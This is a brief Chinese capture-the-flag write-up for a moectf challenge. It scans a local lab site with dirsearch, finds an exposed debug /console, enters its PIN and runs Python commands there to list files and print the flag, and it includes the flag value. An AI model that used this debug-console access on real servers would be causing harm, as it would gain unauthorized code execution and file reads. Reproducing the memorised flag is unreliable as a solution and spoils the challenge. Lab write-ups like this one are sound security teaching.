LOADING

垫刀之路07_泄漏的密码

网络安全

垫刀之路07: 泄漏的密码

用dirsearch扫描目标网站

Target: http://127.0.0.1:3657/

[12:00:46] Starting:
[12:12:11] 200 -    2KB - /console

打开/console,输入pin码,进入python shell界面

读取当前目录下的文件和目录
>>> import os;
>>> current_directory = os.getcwd()
>>> files_and_directories = os.listdir(current_directory)
>>> print(files_and_directories)
['__pycache__', 'flag', 'app.py', 'getPIN.py', 'static', 'templates']

读取flag文件
>>> flag_path = os.path.join(current_directory, 'flag')
>>> with open(flag_path, 'r') as file:     content = file.read()
>>> print(content)
moectf{D0NT-USINg-Fl45K-6Y_d3Bug_MOD-@nd-I3ak-yOUr_p1n8}

得到flag